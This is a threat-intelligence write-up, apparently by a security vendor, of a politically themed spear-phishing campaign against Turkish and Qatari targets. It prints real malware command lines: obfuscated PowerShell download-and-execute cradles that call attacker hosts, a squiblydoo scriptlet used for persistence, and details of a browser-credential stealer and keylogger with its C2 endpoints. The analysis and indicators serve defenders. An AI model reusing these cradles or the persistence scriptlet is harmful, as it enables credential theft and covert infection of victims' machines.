Spear-phishing campaign targeting Qatar and Turkey

Spear phishing campaign

During our daily threat hunting activities we have come across a tweet reporting an active spear-phishing campaign apparently targeting Turkey. After an initial assessment we decided to investigate further, finding similarities with other campaigns active in the recent past and possibly coming from the same actors.

Spear-phishing Documents

The spear-phishing documents target Turkish victims and we managed to find another older one targeting victims in Qatar. The documents try to lure people toward the Conference of the association of “Parliamentarians for Al Quds” in Instanbul. The Parlamentarians for Al Quds is a committee that coordinates “the efforts of international parliamentarians to support the Palestine cause“.

Spear-phishing document
Spear-phishing document
Spear-phishing document
Spear-phishing document

Google translator helps non-arabic speakers to make sense of the content crafted for the spear-phishing campaign:

Spear-phishing text translated by Google
Spear-phishing text translated by Google

the document is an invitation to the conference to be held from the 13th to the 16th of December with the title “Jerusalem is the eternal capital of Palestine“. No announcement related to this conference is currently published on the official website.

Infection strategy

Both documents follow the same traditional infection strategy: trying to lure the victims into clicking on the “enable content” button to run a malicious macro:

Document heading requesting to enable macros
Document heading requesting to enable macros

The embedded macro runs a command prompt invoking powershell that in turn runs the .ps1 script downloaded from a malicious host.

We have reconstructed the storyline using ReaQta-Hive:

ReaQta-Hive storyline
ReaQta-Hive storyline (click to expand)

Winword.exe can be seen to spawn an instance of cmd.exe with a suspicious command-line:

"C:\Windows\System32\cmd.exe" /c " EcHo iEx ( new-oBjeCt sYStem.Io.COmPreSSiON.defLAtEstreAm([system.Io.mEmorYStrEAM] [ConVerT]::fRomBaSE64STRing( 'BcExEkAwEAXQq+hQSHotCg2FgjbWYolNJv6M63uv75asGPirxvViQjYwzMxr44UVpWnDpz64bUISPYr8BGJt7SOUwht2bA7OeNE7klGGdVEsvZQkIi9/') , [sYsTEM.io.compressIOn.CoMpREssiOnmode]::DECOMPRESs )^^^| % {new-oBjeCt io.STreaMreader( $_, [TexT.ENCoDInG]::aSCii )} ).REadtOEnd() | pOwErSheLl -NoeX -nOlo -NOproFiLe -nOnIn -eXeCuTI BypAss -wiNdoWstYL hiDden -"

Deobfuscating the commandline leads to the real parameters passed to powershell.exe:

IEX (New-Object Net.WebClient).DownloadString('http://microsoftdata.linkpc.net/api/cscript')

The way arguments are passed to powershell is interesting as it appears to be a method to evade command-line monitoring:

pOwErSheLl -NoeX -nOlo -NOproFiLe -nOnIn -eXeCuTI BypAss -wiNdoWstYL hiDden -

The argument is “echoed” directly to powershell.exe this is why we don’t see the usual iEx [...] parameter in the powershell.exe command line.

At this point powershell.exe runs the infection routine leveraging on the script downloaded from `hxxp://microsoftdata[.]linkpc[.]net/api/cscript`, below is an abstract of its content:

Script abstract
Script abstract

The powershell script is used to steal: cookies, sessions, logins from Chrome, Opera and Firefox, additionally has a module for keylogging. The data acquired is then exfiltrated to the following C2 :

hxxp://microsoftdata[.]linkpc[.]net

The script downloads the sqlite DLLs required to interact with browsers’ localdb (analysis window #4), it creates a GlobalMutex Global\rYF1pgeADA to avoid the execution of multiple instances of the stealer, it initializes the keylogger and cycles the functions needed to capture the information and finally to establish persistence.

Stealer's code abstract
Stealer’s code abstract (click to expand)

Particular attention should be given to the persistence mechanism used: a scheduled task is used to persist a squiblydoo attack:

Persistence technique
Persistence technique
Scheduled task
Scheduled task

the following scriptlet will be then executed:

<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="rYF1pgeADA"
    classid="{3cf925ab-14c5-4324-9b5c-bbe294ac03a0}" >
    <script language="JScript">
        <![CDATA[
    
            p = 'Powershell';
            c = ' -WiND hiDdeN -nOproFILe -eXeCUTiON bypaSS -Nol -ComMa   "iEx ( new-oBjeCt  sYStem.Io.COmPreSSiON.defLAtEstreAm([system.Io.mEmorYStrEAM] [ConVerT]::fRomBaSE64STRing( \'BcExEkAwEAXQq+hQSHotCg2FgjbWYolNJv6M63uv75asGPirxvViQjYwzMxr44UVpWnDpz64bUISPYr8BGJt7SOUwht2bA7OeNE7klGGdVEsvZQkIi9/\') , [sYsTEM.io.compressIOn.CoMpREssiOnmode]::DECOMPRESs )| % {new-oBjeCt io.STreaMreader( $_, [TexT.ENCoDInG]::aSCii )} ).REadtOEnd() "';
            r = new ActiveXObject("WScript.Shell").Run(p + c,0,false);
    
        ]]>
    </script>
    </registration>
</scriptlet>

ReaQta-Hive correctly identifies this behavior as anomalous and reconstructs the storyline as reported below:

Scriptlet storyline
Scriptlet storyline (click to expand)

 

Stealer Script Capabilities

The script delivered in the spear-phishing campaign, as already mentioned, has the capabilities to steal cookies and login information from the following browsers Google Chrome/Firefox/Opera, keylogging and persistence using a scheduled task which performs a squiblydoo attack. The script accepts custom scripts deployed from the C2, this means its capabilities can be extended at will by the attackers:

We report the list of function signatures below for future reference:

function Set-Key
function Set-EncryptedData
function Uid
function  CookiesTo-MYJson ([System.Collections.ArrayList] $ArrayList)
function  PasswordsTo-MYJson ([System.Collections.ArrayList] $ArrayList)
function unProtecte ($data) 
function ChromeDB
function FirefoxDB
function OperaDB
function Add-SQLite ($link)
function urlPOST($link,$data) 
function OperaSESSION ($SQLiteDB,$search,$condition)
function FirefoxSESSION ($SQLiteDB,$search,$condition)
function ChromeSESSION ($SQLiteDB,$search,$condition)
function ChromePASS ($SQLiteDB)
function BrowsersLOGINS
function _sct
function InstallSCT
function BrowsersPS
function BrowsersLOGGER
function InitLOGGER
function BrowsersCOOKIES ($website,$cname)

The keylogger appears to reuse the same code obtained from the following github repository:

https://github.com/lazywinadmin/PowerShell/blob/master/TOOL-Start-KeyLogger/Start-KeyLogger.ps1

C2 infrastructure and previous samples

The C2 presents an interesting pattern, the path of the URL is always: /api/{endpoint}:

http://{$domain}/api/cscript
http://{$domain}/api/pscript
http://{$domain}/api/logger/submit
http://{$domain}/api/chrome/submit
http://{$domain}/api/firefox/submit
http://{$domain}/api/opera/submit
http://{$domain}/assest/sqlite

Thanks to the above information, we have been able to discover additional samples using the same pattern in previous spear-phishing campaigns:

As pointed out at the beginning, this old sample appeared to target victims in Qatar, at that time by posing as Qatar Charity

The document has been first observed at the beginning of August 2018, there are only minor code changes compared to the current one, mainly just slight alterations in behavior, persistence and script’s code:

Previous spear-phishing campaign storyline
Previous spear-phishing campaign storyline (click to expand)

We’ve uploaded a behavioral analysis on VirusTotal (click on detailed report to access it). In the analysis window #1 we can see that cmd.exe‘s command-line uses no obfuscation:

"C:\Windows\System32\cmd.exe" /C"Echo\IEX (New-Object Net.WebClient).DownloadString('http://4host.publicvm.com/api/cscript') | PowersHell -NOpROfIL -eX BYpAss -NOlOgo -wiNdoWs HiDdEN -noeXIt -noNI -"

For completeness here’s the changes from the previous version of the powershell script used:

Capability Old Version New Version
Persistence scheduled task (via powershell) scheduled task (via regsvr32)
Keylogger Not found Present
Mutex wfCQnIo2G7  rYF1pgeADA

Old panel url:

hxxp://4host[.]publicvm[.]com/
Code changes
Code changes

The three documents share a similar metadata structure:

Metadata Old Version New Version
AppVersion 12.0 16.0
Author Mohamed Bennabszllah Parliament Quds
CompObjUserType Document Microsoft Office Word 97-2003 Document Microsoft Office Word 97-2003
CreateDate 2018:08:05 16:16:00 2018:11:21 14:50:00
LanguageCode English (US) Arabic
CodePage Windows Latin 1 (Western European) Windows Arabic
LastModifiedBy DELL Mohamed Bennabszllah
LastPrinted 0000:00:00 00:00:00 2018:10:19 17:14:00Z
ModifyDate 2018:08:05 16:32:00 2018:11:22 12:20:00
System Windows Windows

We can observe another similarity, both the domains use to the same Free Dynamic DNS service: DNSExit.

linkpc domain
publicvm domain

Final words

This attack is interesting because of the potential targets involved but also because of the techniques adopted: usage of system binaries (lolbins) to perform malicious activity via powershell, scheduled task persistence and the “echoing” technique used to hide the commandline and make detection harder. This threat actor appears to be active and the type of documents retrieved presents evidence that these operations are likely to be politically motivated and not the work of a cyber crime gang.

Spear-Phishing remains one of the most effective vectors and even trained personnel can easily become unwanted victims. ReaQta-Hive helps by automatically detecting targeted threats, like the ones just analysed, using Artificial Intelligence and it enables analysts to perform in-depth threat hunting activities and automated discovery of behavioral anomalies. In-memory threats levering on operating system’s components (lolbins) are capable of bypassing traditional and legacy defenses, at the same time leaving a lower forensic footprint, given the absence of a traditional binary payload. Get in touch with us for a live demonstration and to understand how to address similar threats in real-time.

IOCs

1d2bbe3fd9021bbed4667628b86156bee8763b3d93cdac6de398c751a281a324 دعوة.doc 
bf4d4ee4a8e4472c7968586fa0318e556a89bfd94aeb4e72afd99ab340541770 إستمارة.doc 
7a26d5b600a078816beb3a2849827fa7d45ec85ec6c3343b3857f10edfece74c cscript.ps1
hxxp://microsoftdata[.]linkpc[.]net

7c8cf1e3ec35a6f604699f6481f3463e9ae19c93b8efd861b914c8260304d314 qatar.doc
hxxp://4host[.]publicvm[.]com

Global\rYF1pgeADA mutex
Global\wfCQnIo2G7 mutex 

http://{$domain}/api/cscript
http://{$domain}/api/pscript
http://{$domain}/api/logger/submit
http://{$domain}/api/chrome/submit
http://{$domain}/api/firefox/submit
http://{$domain}/api/opera/submit
http://{$domain}/assest/sqlite

rYF1pgeADA scheduled task name
wfCQnIo2G7 scheduled task name